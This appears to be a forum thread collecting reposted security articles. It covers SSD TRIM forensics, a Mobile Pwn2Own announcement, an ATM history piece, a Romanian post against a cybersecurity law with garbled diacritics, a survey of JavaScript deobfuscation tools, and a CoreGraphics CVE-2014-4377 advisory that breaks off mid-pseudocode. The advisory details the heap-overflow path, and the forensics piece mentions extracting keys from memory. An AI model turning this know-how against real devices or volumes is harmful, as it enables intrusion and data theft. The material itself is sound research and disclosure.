support. · You may customize a schedule to choose when the system will perform TRIM. · SSD TRIM is not available when an SHA cluster exists. · TRIM cannot be enabled on iSCSI LUN. · The TRIM feature under RAID 5 and 6 configurations can only be enabled on the SSDs with DZAT (Deterministic Read Zero after TRIM) support. Please contact your SSD manufacturers for details on DZAT support. PCI-Express and PCIe SSDs Interestingly, the TRIM command is not natively supported by any version of Windows for many high-performance SSD drives occupying the PCI Express slot. Do not confuse PCI Express SSD’s with SATA drives carrying M.2 or mSATA interfaces. Possible exception: TRIM-like performance can be enabled via certain third-party solutions (e.g., Intel SSD Optimizer, a part of Intel SSD Toolbox). RAID The TRIM command is not yet supported over RAID configurations (with few rare exceptions). SSD drives working as part of a RAID array can be analyzed. A notable exception from this rule would be the modern RAID 0 setup using a compatible chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) and a recent version of BIOS. In these configurations, TRIM can be enabled. Corrupted Data Surprisingly, SSD drives with corrupted system areas (damaged partition tables, skewed file systems, etc.) are easier to recover than healthy ones. The TRIM command is not issued over corrupted areas because files are not properly deleted. They simply become invisible or inaccessible to the operating systems. Many commercially available data recovery tools (e.g., Intel® Solid-State Drive Toolbox with Intel® SSD Optimizer, OCZ SSD Toolbox) can reliably extract information from logically corrupted SSD drives. Bugs in SSD Firmware Firmware used in SSD drives may contain bugs, often affecting the TRIM functionality and/or messing up garbage collection. Just to show an example, OCZ Agility 3 120 GB shipped with buggy firmware v. 2.09, in which TRIM did not work. Firmware v. 2.15 fixed TRIM behavior, while v. 2.22 introduced issues with data loss on wake-up after sleep, then firmware v. 2.25 fixed that but disrupted TRIM operation again (information taken from http:/www.overclock.net/t/1330730/ocz-firmware-2-25-trim-doesnt-work-bug-regression-bad-ocz-experience). A particular SSD drive may or may not be recoverable depending on which bugs were present in its firmware. Bugs in SSD Over-Provisioning SSD over-provisioning is one of the many wear-leveling mechanisms intended for increasing SSD life span. Some areas on the disk are reserved on the controller level, meaning that a 120 GB SSD drive carries more than 120 GB of physical memory. These extra data blocks are called over-provisioning area (OP area), and can be used by SSD controllers when a fresh block is required for a write operation. A dirty block will then enter the OP pool, and will be erased by the garbage collection mechanism during the drive’s idle time. Speaking of SSD over-provisioning, firmware bugs can affect TRIM behavior in other ways, for example, revealing trimmed data after a reboot/power off. Solid-state drives are remapping constantly after TRIM to allocate addresses out of the OP pool. As a result, the SSD reports a trimmed data block as writeable (already erased) immediately after TRIM. Obviously, the drive did not have the time to actually clean old data from that block. Instead, it simply maps a physical block from the OP pool to the address referred to by the trimmed logical block. What happens to the data stored in the old block? For a while, it contains the original data (in many cases it’s compressed data, depending on the SSD controller). However, as that data block is mapped out of the addressable logical space, the original data is no longer accessible or addressable. Sounds complex? You bet. That’s why even seasoned SSD manufacturers may not get it right at the first try. Issues like this can cause problems when, after deleting data and rebooting the PC, some users would see the old data back as if it was never deleted. Apparently, because of the mapping issue the new pointers would not work as they should, due to a bug in the drive’s firmware. OCZ released a firmware fix to correct this behavior, but similar (or other) bugs may still affect other drives. SSD Shadiness: Manufacturers Bait-and-Switch When choosing an SSD drive, customers tend to read online reviews. Normally, when the new drive gets released, it is getting reviewed by various sources soon after it becomes available. The reviews get published, and customers often base their choice on them. But what if a manufacturer silently changes the drive’s specs without changing the model number? In this case, an SSD drive that used to have great reviews suddenly becomes much less attractive. This is exactly what happened with some manufacturers. According to ExtremeTech (http:/www.extremetech.com/extreme/184253-ssd-shadiness-kingston-and-pny-caught-bait-and-switching-cheaper-components-after-good-reviews), two well-known SSD manufacturers, Kingston and PNY, were caught bait-and-switching cheaper components after getting the good reviews. In this case, the two manufacturers were launching their SSDs with one hardware specification, and then quietly changed the hardware configuration after reviews have gone out. So what’s in there for us? Well, the forensic-friendly SandForce controller was found in the second revision of PNY Optima drives. Instead of the original Silicon Motion controller, the new batch of PNY Optima drives had a different, SandForce-based controller known for its less-than-perfect implementation of garbage collection leaving data on the disk for a long time after it’s been deleted. Small Files: Slack Space Remnants of deleted evidence can be acquired from so-called slack space as well as from MFT attributes. In the word of SSD, the term “slack space” receives a new meaning. Rather than being a matter of file and cluster size alignment, “slack space” in SSD drives deals with the different sizes of minimum writeable and minimum erasable blocks on a physical level. Micron, the manufacturer of NAND chips used in many SSD drives, published a comprehensive article on SSD structure: https:/www.micron.com/~/media/Documents/Products/Technical%20Marketing%20Brief/ssd_effect_data_placement_writes_tech_brief.pdf In SSD terms, Page is the smallest unit of storage that can be written to. The typical page size of today’s SSD is 4 KB or 8 KB. Block, on the other hand, is the smallest unit of storage that can be erased. Depending on the design of a particular SSD drive, a single block may contain 128 to 256 pages. As a result, if a file is deleted and its size is less than the size of a single SSD data block, OR if a particular SSD data block contain pages that still remain allocated, that particular block is NOT erased by the garbage collection algorithm. In practical terms, this means that files or file fragments (chunks) sized less than 512 KB or less than 2 MB depending on SSD model, may not be affected by the TRIM command, and may still be forensically recoverable. However, the implementation of the Deterministic Read After Trim (DRAT) protocol by many recent SSD drives makes trimmed pages inaccessible via standard SATA commands. If a particular SSD drive implements DRAT or DZAT (Deterministic Read Zero After Trim), the actual data may physically reside on the drive for a long time, yet it will be unavailable to forensic specialists via standard acquisition techniques. Sending the SSD drive to the manufacturer might be the only way of obtaining this information on a physical level. Small Files: MFT Attributes Most hard drives used in Windows systems are using NTFS as their file system. NTFS stores information about the files and directories in the Master File Table (MFT). MFT contains information about all files and directories listed in the file system. In other words, each file or directory has at least one record in MFT. In terms of computer forensics, one particular feature of MFT is of great interest. Unique to NTFS is the ability to store small files directly in the file system. The entire content of a small file can be stored as an attribute inside an MFT record, greatly improving reading performance and decreasing wasted disk space (“slack” space), referenced in the previous chapter. As a result, small files being deleted are not going anywhere. Their entire content continues residing in the file system. The MFT records are not emptied, and are not affected by the TRIM command. This in turn allows investigators recovering such resident files by carving the file system. How small does a file have to be to fit inside an MFT record? Very small. The maximum size of a resident file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files for the purpose of digital forensics. Encrypted Volumes Somewhat counter-intuitively, information deleted from certain types of encrypted volumes (some configurations of BitLocker, TrueCrypt, PGP and other containers) may be easier to recover as it may not be affected by the TRIM command. Files deleted from such encrypted volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the user) if the investigator knows either the original password or binary decryption keys for the volume. Encrypted containers are a big topic, so we’ll cover it in a dedicated chapter. TRIM on encrypted volumes is a huge topic well worth a dedicated article or even a series of articles. With the large number of crypto containers floating around and all the different security considerations and available configuration options, determining whether TRIM was enabled on a particular encrypted volume is less than straightforward. Let’s try assembling a brief summary on some of the most popular encryption options. Apple FileVault 2 Introduced with Apple OS X “Lion”, FileVault 2 enables whole-disk encryption. More precisely, FileVault 2 enables whole-volume encryption only on HFS+ volumes (Encrypted HFS). Apple chose to enable TRIM with FileVault 2 volumes on drives. It has the expected security implication of free sectors/blocks being revealed. Microsoft BitLocker Microsoft has its own built-in version of volume-level encryption called BitLocker. Microsoft made the same choice as Apple, enabling TRIM on BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the TRIM command is only available on NTFS volumes. TrueCrypt TrueCrypt supports TRIM pass-through on encrypted volumes located on SSD drives. The company issued several security warnings in relation to wear-levelling security issues and the TRIM command revealing information about which blocks are in use and which are not. (http:/www.truecrypt.org/docs/trim-operation and http:/www.truecrypt.org/docs/wear-leveling) PGP Whole Disk Encryption By default, PGP whole-disk encryption does not enable TRIM on encrypted volumes. However, considering wear-leveling issues of SSD drives, Symantec introduced an option to enable TRIM on SSD volumes via a command line option: –fast (http:/www.symantec.com/connect/forums/pgp-and-ssd-wear-leveling). If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the entire content of a file representing the encrypted volume, which disables the effect of the TRIM command for the contents of the encrypted volume. More research is required to investigate these options. At this time one thing is clear: in many configurations, including default ones, files deleted from encrypted volumes will not be affected by the TRIM command. Which brings us to the question of the correct acquisition of PCs with encrypted volumes. Forensic Acquisition: The Right Way to Do The right way to acquire a PC with a crypto container can be described with the following sentence: “If it’s running, don’t turn it off. If it’s off, don’t turn it on.” Indeed, the original decryption keys are cached in the computer’s memory, and can be extracted from a LiveRAM dump obtained from a running computer by performing a FireWire attack. These keys can be contained in page files and hibernation files. Tools such as Passware can extract decryption files from memory dumps and page/hibernation files, decrypting the content of encrypted volumes. Reality Steps In: Why Real SSDs are Often Recoverable In reality, things may look different from what was just described above in such great technical detail. In our lab, we’ve seen hundreds of SSD drives acquired from a variety of computers. Surprisingly, Belkasoft Evidence Center was able to successfully carve deleted data from the majority of SSD drives taken from inexpensive laptops and sub-notebooks such as ASUS Eee or ASUS Zenbook. Why is it so? There are several reasons, mainly “cost savings” and “miniaturization”, but sometimes it’s simply over-engineering. Inexpensive laptops often use flash-based storage, calling that an SSD in their marketing ploy. In fact, in most cases it’s just a slow, inexpensive and fairly small flash-based storage having nothing to do with real SSD drives. Ultrabooks and sub-notes have no space to fit a full-size SSD drive. They used to use SSD drives in PCIe form factor (as opposed to M.2 or mSATA) which did not support the SATA protocol. Even if these drives are compatible with the TRIM protocol, Windows does not support TRIM on non-ATA devices. As a result, TRIM is not enabled on these drives. SSD drives are extremely complex devices requiring extremely complex firmware to operate. Many SSD drives were released with buggy firmware effectively disabling the effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware to a working version, the original data may reside on an SSD drive for a long time. The fairly small (and inexpensive) SSD drives used in many entry-level notebooks lack support for DRAT/DZAT. As a result, deleted (and trimmed) data remain accessible for a long time, and can be successfully carved from a promptly captured disk image. On the other end of the spectrum are the very high-end, over-engineered devices. For example, Acer advertises its Aspire S7-392 as having a RAID 0 SSD. According to Acer marketing, “RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access your files and transfer photos and movies quicker than ever!” (http:/www.acer.com/aspires7/en_US/). This looks like over-engineering. As TRIM is not enabled on RAID SSD’s in any version of Windows, this ultra-fast non-conventional storage system may slow down drastically over time (which is exactly why TRIM was invented in the first place). For us, this means that any data deleted from these storage systems could remain there for at least as long as it would have remained on a traditional magnetic disk. Of course, the use of the right chipset (such as Intel H67, Z77, Z87, H87, Z68) accompanied with the correct drivers (the latest RST driver from Intel allegedly works) can in turn enable TRIM back. However, we are yet to see how this works in reality. (http:/www.anandtech.com/show/6477/trim-raid0-ssd-arrays-work-with-intel-6series-motherboards-too) Conclusion SSD forensics remains different. SSDs self-destroy court evidence, making it difficult to extract deleted files and destroyed information (e.g., from formatted disks) is close to impossible. Numerous exceptions still exist, allowing forensic specialists to access destroyed evidence on SSD drives used in certain configurations. There has been little progress in SSD development since the publication of our last article on SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less money. That aside, compressing SSD controllers appear to become the norm, making off-chip acquisition unpractical and killing all sorts of DIY SSD acquisition hardware. More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in the SATA standard a long time ago. This in turn means that a quick format is likely to instantly render deleted evidence inaccessible to standard read operations, even if the drive is acquired with a forensic write-blocking imaging hardware immediately after. SSD drives are getting more complex, adding over-provisioning support and using compression for better performance and wear leveling. However, because of the increased complexity, even seasoned manufacturers released SSD drives with buggy firmware, causing improper operation of TRIM and garbage collection functionality. Considering just how complex today’s SSD drives have become, it’s surprising these things do work, even occasionally. The playfield is constantly changing, but what we know now about SSD forensics gives hope. About the authors Yuri Gubanovis a renowned computer forensics expert. He is a frequent speaker at industry-known conferences such as HTCIA, TechnoSecurity, CEIC and others. Yuri is the Founder and CEO of Belkasoft. Besides, Yuri is senior lecturer at St-Petersburg State University. You can add Yuri Gubanov to your LinkedIn network at Yuri Gubanov | LinkedIn Oleg Afonin is an expert and consultant in computer forensics. You can contact the authors via research@belkasoft.com About Belkasoft Research Belkasoft Research is based in St. Petersburg State University. The company performs non-commercial researches and scientific activities Sursa: Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions | Forensic Focus - Articles
-
Admin | September 4, 2014 HP Security Research’s Zero Day Initiative (ZDI) invites you to join us for the third annual Mobile Pwn2Own competition, to be held this year on November 12-13 at PacSec Applied Security Conference in Tokyo, Japan. We’re looking forward to rewarding the world’s top researchers for demonstrating and disclosing their stealthy attacks on mobile devices, and we’re delighted that our friends at Google’s Android Security Team and BlackBerry are joining us again as sponsors. This year, we’re upping the prize pool to $425,000, rearranging the prize package, and introducing new devices in order to attract the best and brightest researchers and enhance security for the most popular mobile platforms. In their sights – the mobile attack surface In case you’re not familiar, Mobile Pwn2Own is ZDI’s annual contest that rewards security researchers for highlighting security vulnerabilities on mobile platforms. (You may have heard of its sister contest for other platforms, Pwn2Own, which was held in March this year at CanSecWest.) With the near-ubiquity of mobile devices, vulnerabilities on these platforms are becoming increasingly coveted and are actively and vigorously hunted by criminals for exploitation. This contest helps to harden these devices by finding vulnerabilities first and sharing that research with mobile device and platform vendors. This year’s bounty The prize pool is rising again, with HP and its sponsors offering over $425,000 (USD) in cash and prizes to researchers who successfully compromise selected mobile targets from particular categories, which is $125,000 more than last year’s contest. Contestants are judged on their ability to uncover new vulnerabilities and to develop cutting-edge exploit techniques that can be used to compromise some of the world’s most popular mobile devices. Mobile Web Browser ($50,000) Mobile Application/Operating System ($50,000) Reachable by a remote attacker (including through browser) [*]Short Distance ($75,000), either: Bluetooth, or Wi-Fi, or Near Field Communication (NFC) [*]Messaging Services ($100,000), either: Short Message Service (SMS), or Multimedia Messaging Service (MMS), or Commercial Mobile Alert System (CMAS) [*]Baseband ($150,000) Limited to Apple iPhone, Google Nexus, BlackBerry Z30 Only Contestants can select the target they want to compromise during pre-registration. The details, including exact OS version, applications, firmware and model numbers will be coordinated after pre-registration. The following targets are available for selection: Amazon Fire Phone Apple iPhone 5s Apple iPad Mini with Retina Display BlackBerry Z30 Google Nexus 5 Google Nexus 7 Nokia Lumia 1520 Samsung Galaxy S5 How do I enter? The contest is open to all registrants in the PacSec 2014 conference (as long as you meet our rather inclusive eligibility requirements). Start by reviewing the contest rules, here. Next, if you don’t already have a free ZDI researcher account, you need to sign-up here. When you’re all signed up as a ZDI researcher, it’s simply a matter of contacting us to register for the contest. More importantly, how do I win? Be the first to compromise a selected target in one of the categories using a previously unknown vulnerability (one that has not been disclosed to the affected vendor). You’ve got 30 minutes to complete your attempt. When you’ve successfully demonstrated your exploit and ‘pwned’ the targeted device, you need to provide ZDI with a fully functioning exploit and a whitepaper detailing all of the vulnerabilities and techniques utilized in your attack. A successful attack against these devices must require no user interaction beyond the action required to browse to the malicious content. As always, the initial vulnerability used in the attack must be in the registered category. The contestant must demonstrate remote code execution by bypassing sandboxes (if applicable) and exfiltrating sensitive information. To avoid interfering with licensed carrier networks, all RF attacks must be completed within the provided RF isolation enclosure. The vulnerabilities utilized in the attack must be unpublished zero days. As always, ZDI reserves the right to determine what constitutes a successful attack. The vulnerabilities and exploit techniques discovered by the winning researchers will be disclosed to the affected vendors. If the affected vendor is at the conference, we can even arrange to hand over the vulnerability details onsite for the fastest possible remediation. If you missed it above, the full contest rules are here. Want to know more? We’ll be tweeting regular updates and news on Mobile Pwn2Own up to and during the contest. You can follow us @thezdion Twitter or search for the hash tag #pwn2own. Visit pwn2own.com for updates throughout the contest and to check out content from past contests, including photos, videos and more. For press inquiries, please contact Heather Goudey heather.goudey@hp.com Sursa: Mobile Pwn2Own Tokyo 2014 - PWN2OWN
-
The man who invented the cash machine [TABLE=width: 416] [TR] [TD] By Brian Milligan Business reporter, BBC News [/TD] [/TR] [/TABLE] "They're clever scoundrels," fumes John Shepherd-Barron at his remote farmhouse in northern Scotland. He is referring to the seals which are raiding his salmon farm and stealing fish. [TABLE=width: 208, align: right] [TR] [TD=width: 5][/TD] [TD=class: sibtbg] John Shepherd-Barron's cash machine first appeared in 1967 Inventor's memories [/TD] [/TR] [/TABLE] "I invented a device to scare them off by playing the sound of killer whales, but it's ended up only attracting them more." But failure with this device is in contrast to the success of his first and greatest invention: the cash machine. The world's first ATM was installed in a branch of Barclays in Enfield, north London, 40 years ago this week. Reg Varney, from the television series On the Buses, was the first to withdraw cash. Inspiration had struck Mr Shepherd-Barron, now 82, while he was in the bath. "It struck me there must be a way I could get my own money, anywhere in the world or the UK. I hit upon the idea of a chocolate bar dispenser, but replacing chocolate with cash." Barclays was convinced immediately. Over a pink gin, the then chief executive signed a hurried contract with Mr Shepherd-Barron, who at the time worked for the printing firm De La Rue. Teething troubles Plastic cards had not been invented, so Mr Shepherd-Barron's machine used cheques that were impregnated with carbon 14, a mildly radioactive substance. The machine detected it, then matched the cheque against a Pin number. [TABLE=width: 203, align: right] [TR] [TD] Reg Varney was the first to use an ATM [/TD] [/TR] [/TABLE] However, Mr Shepherd-Barron denies there were any health concerns: "I later worked out you would have to eat 136,000 such cheques for it to have any effect on you." The machine paid out a maximum of £10 a time. "But that was regarded then as quite enough for a wild weekend," he says. To start with, not everything went smoothly. The first machines were vandalised, and one that was installed in Zurich in Switzerland began to malfunction mysteriously. It was later discovered that the wires from two intersecting tramlines nearby were sparking and interfering with the mechanism. One by-product of inventing the first cash machine was the concept of the Pin number. Mr Shepherd-Barron came up with the idea when he realised that he could remember his six-figure army number. But he decided to check that with his wife, Caroline. "Over the kitchen table, she said she could only remember four figures, so because of her, four figures became the world standard," he laughs. End of cash? Customers using the cash machine at Barclays in Enfield High Street are mostly unaware of its historical significance. A small plaque was placed there on the 25th anniversary, but few people notice it. Given that there are now more than 1.6 million cash machines worldwide, it is a classic case of British understatement. [TABLE=width: 203, align: right] [TR] [TD] The plaque at the site of the first ATM goes unnoticed by many [/TD] [/TR] [/TABLE] Mr Shepherd-Barron says he and his wife realised the importance of his invention only when they visited Chiang Mai in northern Thailand. They watched a farmer arriving on a bullock cart, who removed his wide-brimmed hat to use the cash machine. "It was the first evidence to me that we'd changed the world," he says. But even though he invented the machine, Mr Shepherd-Barron believes its use in future will be very different. He predicts that our society will no longer be using cash within a few years. "Money costs money to transport. I am therefore predicting the demise of cash within three to five years." He believes fervently that we will soon be swiping our mobile phones at till points, even for small transactions. At 82, Mr Shepherd-Barron is very much alive to new ideas and inventions - even though his device that plays killer whale noises still needs a little bit of tinkering. Sursa: BBC NEWS | Business | The man who invented the cash machine
-
Legea securitatii cibernetice revine pe fast forward 23/09/14 14:27:00, by bogdan, 809 words Legea securitatii cibernetice revine pe fast forward Doar nu credeati ca o data cu decizia pe pre-pay, onor alesii nostrii si institutiile impingatoare de securism cibernetic au inteles ca textele de lege ar trebui dezbatute serios - mai ales cele care aduc atingere libertatilor fundamentale? Propunerea de lege prvind securitatea cibernetica a Romaniei n-a mai fos dezbatuta in Camera Deputatilor, ca a trecut prin adoptare tacita pe 17 Septembrie. De cum a fost trimisa la Senat, a primit termen de 2 (doua) zile (adica maine) pentru a primi raport de la Comisia de aparare (adica Comisia de fond). (desi NU este oficial in procedura de urgenta). Evident, comisia de drepturile omului nu a fost inclusa nici macar pentru aviz. Dupa cum v-am mai precizat deja, propunerea asta de lege este mult mai naspa decat cea cu pre-pay-ul care un mizilic. Sa va reamintesc cele mai interesante propuneri: Toate firmele (ca SRI zice ca utilizatori nu inseamna persoane fizice, eu zic ca inseamna - dar sa nu ne pierdem in detalii) trebuie sa “permita accesul la date” acestor autoritati (SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM). Accesul se face la simpla “solicitare motivata". Atentie mare - nu e vorba sa dai datele informatice pe care le ai si care ar putea sa ajute la vreo investigatie, ci “accesul la date", daca n-am fost prea subtil cu diferenta asta. Toate firmele care au un laptop, smartphone sau orice alt device trebuie sa adopte politici de securitate cibernetic?, ca si s? identifice ?i s? implementeze m?surile tehnice ?i organizatorice adecvate pentru a gestiona eficient riscurile de securitate. Asta inseamn? minim 1500 de euro/firma investi?i in securitate. (o sa vedeti ce chestii frumoase trebuie sa scrieti in politicile de securitate cibernetica…) In vreme ce UE ne cere ca aceste institu?ii care se ocupa de domeniul securit??ii cibernetice s? fie “organisme civile, care s? func?ioneze integral pe baza controlului democratic, ?i nu ar trebui s? desf??oare activit??i în domeniul informa?iilor", noi dam SRI-ul ca cea mai democratica, civila si apropriata de cetateni dintre institutii. Competenta tehnica o avea, dar sub control democratic nu este. Si nici nu cunoaste termeni precum dezbatere publica, acces la informatii publice sau transparenta decizionala. Dar va zic - nu va agitati prea mult! Oricum Senatul nu are timp sa dezbata, iar cele “18 victime/secunda (n.m - asta vine 1.5 mil de victime pe zi) ale Internetului” au nevoie de SRI sa le protejeze. Chiar daca ele nu vor. De asemenea, observatiile unora si amendamentele depuse nici macar nu sunt luate in considerare pentru este greu sa judeci cu mintea ta. Daca ne zice SRI ceva, atunci asa este cu siguranta. Iar argumentele de drepturile omului sau deciziile CCR nu sunt suficiente pentru nimeni - oricum Romania nu este o democratie. CCR a declat ca accesul la datele de trafic trebuie supus controlului unui judecator, dar cu siguranta va decide altfel daca datele accesate pot fi si date de continut (deci mai mult decat date de trafic). Solicit?rile de acces la datele re?inute în vederea utiliz?rii lor în scopul prev?zut de lege, formulate de c?tre organele de stat cu atribu?ii în domeniul securit??ii na?ionale, nu sunt supuse autoriz?rii sau aprob?rii instan?ei judec?tore?ti, lipsind astfel garan?ia unei protec?ii eficiente a datelor p?strate împotriva riscurilor de abuz precum ?i împotriva oric?rui acces ?i a oric?rei utiliz?ri ilicite a acestor date. Aceast? împrejurare este de natur? a constitui o ingerin?? în drepturile fundamentale la via?? intim?, familial? ?i privat? ?i a secretului coresponden?ei ?i, prin urmare, contravine dispozi?iilor constitu?ionale care consacr? ?i protejeaz? aceste drepturi. Am zis destule. Pentru o completare a imaginii generale cititi si articolul lui Dan Tapalaga - Tara Democratiei cu Epoleti. Iar unul dintre autorii de pe Contributors comenteaza sec situatia de detaliu mai bine decat v-as fi descris-o eu: Mai exist? de asemenea în România legi proaste, cu dispozi?ii neconstitu?ionale, adoptate de parlamentari ce fac exces de zel în cl?direa unor rela?ii de bun? vecin?tate cu alte institu?ii ale statului, precum ?i institu?ii ale statului ce fac exces de zel în criticarea Cur?ii Constitu?ionale pentru c? cenzureaz? excesele de prostie inten?ionat? ale Parlamentului. Toate acestea sub acoperirea unei ?arade legate de rezultate deosebite, îns? selective (mai nou chiar în sens activ-negativ), în lupta împotriva corup?iei, precum ?i sub acoperirea a de acum omniprezentei amenin??ri externe, în special cibernetice ?i în special din Orientul Mijlociu. Ar fi rizibil dac? nu ar fi trist pentru c? înainte s? fie albastru precaut a fost roz imaginat, mai ales înainte ca prietenoasa prim?var? ruseasc? s? î?i arate delicat ghioceii la Odessa. Într-un cuvânt, totul e bine în România, ?ara este sigur? ?i va fi bine protejat? cibernetic de ac?iuni de subversiune intern? realizate în for??, precum puciul parlamentar anticonstitu?ional din vara lui 2012, un maxim de stabilitate roz sub umbrela alian?ei ce e datoare s? apere România. Uneori chiar ?i de ea îns??i, nu-i a?a? ?i în continuare, în România, nimeni nu are absolut nicio problem?. Noapte buna! Sursa: Legea securitatii cibernetice revine pe fast forward Autor: Bogdan MANOLEA
-
Javascript Deobfuscation Tools Redux Posted on September 23, 2014 by darryl Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention. Here are the tools I’ll be testing: Automated JSUnpack Javascript Deobfuscator (Firefox Add-On) SpiderMonkey Semi-Automated/Manual JSDetox Javascript Debugger (all are similar; using Script Debugger for this test): Microsoft Script Debugger, Chrome Developer Tools, Firefox Developer Tools, Firebug (Firefox Add-On) Revelo Here are the obfuscated scripts: Sample 1 Dean Edwards Packer Sample 2 HiveLogic Enkoder Sample 3 For this sample, I used the same original HTML code as the above and obfuscated it using three online obfuscators in the following order: obfuscatorjavascript.com, www.gaijin.at/en/olsjse.php, www.atasoyweb.net/Javascript_Encrypter/javascript_encrypter_eng.php Sample 4 Speed-Trap JS Sample 5 Gong Da EK Sample 6 RIG EK Sample 7 Angler EK Sample 8 Nuclear EK Prelude My plan is simple. Use the tools to try to deobfuscate the above scripts without spending more than a few minutes on each one. If I can’t figure it out by making obvious tweaks along the way then I move on. To be honest, I’m no expert with all of these tools so I’m not taking full advantage of its capabilities but this should give you some idea of what you can expect. I would encourage you to play along (the scripts are here) . Be sure you do this in a virtual machine because many of the scripts are real and very malicious. JSUnpack JSUnpack is fully automated and can deal with a lot of scripts except the complex ones. Javascript Deobfuscator This Firefox add-on is quite robust and also completely automated. Interestingly, it is able to deobfuscate the hard ones but trips up on an easy one. This tool won’t be able to handle scripts that target Internet Explorer for obvious reasons. You might be able to comment out some browser sniffing routines though. SpiderMonkey The SpiderMonkey tool would be similar to using Rhino or V8 engines but Didier Stevens adds some mods that has beefed up SpiderMonkey’s capabilities. DOM-based scripts tend to pose a problem for these engines but you can make several tweaks to the script and define objects to get around this. JSDetox This tool has a lot of capability and potential. The main reason it can’t deob the malicious scripts is probably because I suck at using it. Javascript Debugger Pretty much all of the Javascript debuggers work the same way so I just lumped them together as a single class of tools. Using a debugger can be slow because you have to follow along with the script and know where to place breakpoints but it is often the most effective way of deobfuscating scripts. Revelo I would have hoped my own tool would do pretty well against these scripts and it did. The main challenge with using Revelo is that you need to understand the script you are working on and be able to recognize entry and exit points to inspect. This tool is definitely not for everyone but it has the capability to do just as well as a debugger. Conclusion and Scorecard As I mentioned earlier, I’m probably not making the most of every tool as they are quite capable and powerful in their own right. The end result is probably more of a reflection of my abilities rather than the tool so take this with a barrel of salt. Sursa: Javascript Deobfuscation Tools Redux | Kahu Security
-
CoreGraphics Memory Corruption - CVE-2014-4377 Apple CoreGraphics library fails to validate the input when parsing the colorspace specification of a PDF XObject resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input in any application linked with the affected framework. Using a crafted PDF file as an HTML image and combined with a information leakage vulnerability this issue leads to arbitrary code execution. A complete 100% reliable and portable exploit for MobileSafari on IOS7.1.x. can be downloaded from github Summary Title: Apple CoreGraphics Memory Corruption CVE Name: CVE-2014-4377 Permalink: Binamuse Blog: CoreGraphics Memory Corruption - CVE-2014-4377 Date published: 2014-09-18 Date of last update: 2014-09-19 Class: Client side / Integer Overflow / Memory Corruption Advisory: HT6441 HT6443 Vulnerability Details Safari accepts PDF files as native image format for the < image > html tag. Thus browsing an html page in Safari can transparently load multiple pdf files without any further user interaction. CoreGraphics is the responsible of parsing the PDF files. Apple Core Graphics framework fails to validate the input when parsing the colorspace specification of a PDF XObject. A small heap memory allocation can be overflowed with controlled data from the input enabling arbitrary code execution in the context of Mobile Safari (A memory layout information leak is needed). The Core Graphics framework is a C-based API that is based on the Quartz advanced drawing engine. It provides low-level, lightweight 2D rendering. This is used in a wide range of applications to handle path-based drawing, transformations, color management, offscreen rendering, patterns, gradients and shadings, image data management, image creation, masking, and PDF document creation, display, and parsing. CoreGraphics library implements the functionality to load and save several graphic formats such as PDFs and it is used by most common applications that deal with images, including Safari, Preview, Skype, etc. The 32 bit version of the framework also implements the x_alloc heap, a set of low level procedures to manage an internal heap memory structure used when processing images of different types (including PDF files). The functions x_calloc and x_free are used very frequently to allocate and de-allocate memory fast. The x_calloc function behaves as a normal calloc except it allocates a bit extra memory for metadata. It actually allocates an extra 2*sizeof(void*) bytes and pad the resulting size to the next 16 byte border. When the chunk is in use (allocated) this extra space is used to hold the size of the chunk, thus making it super fast to free. On the other hand when the chunk is free the metadata space is used to form a free-list linked list, the first metadata value in a free chunk points to the next free chunk. This is its pseudocode. Think x_mem_alloc0_size as a plain malloc. void* __cdecl x_calloc(size_t nmemb, size_t size) { void * buffer = x_mem_alloc0_size((nmemb * size + 31) & -16); *(size_t *)buffer = (nmemb * size + 31) & -16; return buffer + 16; } This function is prone to integer overflow because it doesn’t check for (nmemb * size) to be less than MAXUINT-16. Then if a programmer tries to allocate a size in the range [-16,-1] x_alloc will allocate 0(zero) or 16 bytes (instead of the inmense value requiered) without triggering any exception. An x_calloc bug There is a x_calloc related bug in how PDF handles the colorspace for embedded XObjects. Forms and images of different types can be embedded in a PDF file using an XObject pdf stream. As described in the pdf specification, an XObject can specify the colorspace in which the intended image is described. The CoreGraphics library fails to validate the input when parsing the /Indexed colorspace definition of an XObject pdf stream and enables an attacker to reach x_calloc with a size in the [16,-1] range. The indexed colorspace definition is table based and relies on a base colorspace. For example, the following definition defines an indexed colorspace of 200 colors based on a RGB base colorspace with the table defined in the indirect object 8 0 R. For more info on indexed colorspaces see section 8.6.6.3 of the pdf specification. /ColorSpace [/indexed /DeviceRGB 200 8 0 R] The following is an excerpt of the function _cg_build_colorspace. It was taken from the dyld_shared_cache_armv7 of the iPhone3,1 (iPhone4) iOS version 7.1.1. The function can be disassembled at address 0x2D59F260 considering that the dyld_shared_cache is loaded at 0x2C000000. /* cs_index_array should represent something like this: [/indexed /DeviceRGB 200 8 0 R] */ /* Sanity check, array must have 4 elements */ if ( CGPDFArrayGetCount(cs_index_array) != 4 ) { message = "invalid `Indexed' color space: incorrect number of entries in color space array."; goto EXIT; } /* Sanity check, 2nd element should be an object */ if ( !CGPDFArrayGetObject(cs_index_array, 1, &base_cs_obj) ) { message = "invalid `Indexed' color space: second color space array entry is not an object."; goto EXIT; } /* build the base colorspace */ base_cs = cg_build_colorspace(base_cs_obj); if ( !base_cs ) { message = "invalid `Indexed' color space: invalid base color space."; goto EXIT; } /* get the 3rd element. N, the number of indexed colors in the table */ if ( CGPDFArrayGetInteger(cs_index_array, 2, &N) ) { message = "invalid `Indexed' color space: high value entry is not an integer."; goto RELEASE_EXIT; } /* Sanity check. N should be positive */ if ( N <= -1 ) { message = "invalid `Indexed' color space: high value entry is negative."; goto RELEASE_EXIT; } /* cs is the resultant colorspace, init to NULL */ cs = 0; /* if 4th element is a pdf stream get it and do stuff ...*/ if ( CGPDFArrayGetStream(cs_index_array, 3, &lookup_stream) == 1 ) { lookup_buffer = 